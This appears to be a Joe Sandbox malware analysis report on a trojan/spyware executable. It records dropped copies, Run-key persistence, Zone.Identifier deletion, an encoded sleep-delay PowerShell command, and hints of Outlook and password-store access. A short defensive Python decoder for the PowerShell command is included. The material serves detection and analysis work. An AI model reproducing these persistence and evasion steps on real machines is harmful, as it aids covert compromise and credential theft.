                Source: PSFBGrvmxy.exe, 00000000.00000002.390178593.0000000000F80000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameclr.dllT vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000000.312114779.0000000000900000.00000002.00000001.01000000.00000003.sdmp :: Binary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000003.395360751.000000000675A000.00000004.00000020.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.613133509.0000000000BC9000.00000004.00000010.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameUNKNOWN_FILET vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: OriginalFilename vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E39000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe :: Binary or memory string: OriginalFilenameLnyrwpx.exe" vs PSFBGrvmxy.exe
                Source: Joe Sandbox View :: Dropped File: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe 66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                Source: Joe Sandbox View :: Dropped File: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe 66D51327BAB933EDA9D755EB691E584FCB324B04C573D1BE50D634C7297134F8
                Source: PSFBGrvmxy.exe :: ReversingLabs: Detection: 66%
                Source: PSFBGrvmxy.exe :: Virustotal: Detection: 57%
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: PSFBGrvmxy.exe :: Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: unknown :: Process created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Process created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: unknown :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                Source: unknown :: Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknown :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe"
                Source: unknown :: Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Process created: C:\Users\user\Desktop\PSFBGrvmxy.exe C:\Users\user\Desktop\PSFBGrvmxy.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Process created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
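                The -ENC argument repeated in the process-creation entries above is not encrypted: powershell.exe -EncodedCommand takes the script as base64 of its UTF-16LE text. The helper below is an added example written for this report, not Joe Sandbox output or code from the sample; it recovers the plaintext from a command line exactly as the report records it. The set of abbreviations it accepts for -EncodedCommand is an assumption covering the common ones.

```python
"""Recover the plaintext of a powershell.exe -EncodedCommand argument.

Added example written for this report; not Joe Sandbox output or sample code.
-EncodedCommand takes the script as base64 of UTF-16LE text, which is why the
argument looks like noise if it is decoded as ASCII or UTF-8.
"""
from __future__ import annotations

import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand. The
# alternatives below cover the abbreviations commonly seen in telemetry;
# assumption: the list is illustrative, not complete.
_ENC_SWITCH = re.compile(r"^[-/](?:e|ec|en|enc|encoded|encodedcommand)$", re.IGNORECASE)

# Command line copied from the report's process-creation entries.
REPORT_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA=="
)


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded script if cmdline uses -EncodedCommand, else None.

    Splitting on whitespace is enough here: the switch and its base64 value
    never contain spaces, and the quoted image path is not needed.
    """
    argv = cmdline.split()
    for switch, value in zip(argv, argv[1:]):
        if not _ENC_SWITCH.match(switch):
            continue
        try:
            raw = base64.b64decode(value, validate=True)
            # UTF-16LE, so a genuine payload has an even number of bytes; a
            # malformed one raises UnicodeDecodeError, a ValueError subclass.
            return raw.decode("utf-16-le").rstrip("\x00")
        except ValueError:
            return None  # switch present, but the payload is not a valid encoded script
    return None


if __name__ == "__main__":
    print(decode_encoded_command(REPORT_CMDLINE))
```

                For this sample the argument decodes to start-sleep -seconds 20, a 20-second pause before the parent continues, consistent with the sleep-based evasion signatures in the overview. The same helper applies to any -e/-ec/-enc command line pulled from Sysmon event ID 1 or Security event 4688 logs.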
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File created: C:\Users\user\AppData\Roaming\Xnckpwz
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File created: C:\Users\user\AppData\Local\Temp\CdFileMgr
                Source: classification engine :: Classification label: mal100.troj.spyw.evad.winEXE@25/17@11/3
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Users\user\Desktop\desktop.ini
                Source: Vlrvln.exe, 0000000F.00000002.578941562.0000000003119000.00000004.00000800.00020000.00000000.sdmp :: Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PSFBGrvmxy.exe :: Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe :: Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4996:120:WilError_01
                Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3176:120:WilError_01
                Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4748:120:WilError_01
                Source: C:\Windows\System32\conhost.exe :: Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5100:120:WilError_01
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe :: File read: C:\Windows\System32\drivers\etc\hosts
                Source: Window Recorder :: Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: PSFBGrvmxy.exe :: Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe :: Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: PSFBGrvmxy.exe :: Static file information: File size 1824768 > 1048576
                Source: PSFBGrvmxy.exe :: Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PSFBGrvmxy.exe :: Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1bce00
                Source: PSFBGrvmxy.exe :: Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Code function: 3_2_058A7140 pushfd ; ret 3_2_058A7141
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Code function: 3_2_058A80E2 push eax; iretd 3_2_058A80E9
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Code function: 3_2_069FD3DF push es; ret 3_2_069FD3E0
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | File created: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | File created: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe

                Boot Survival

                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Vlrvln

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | File opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
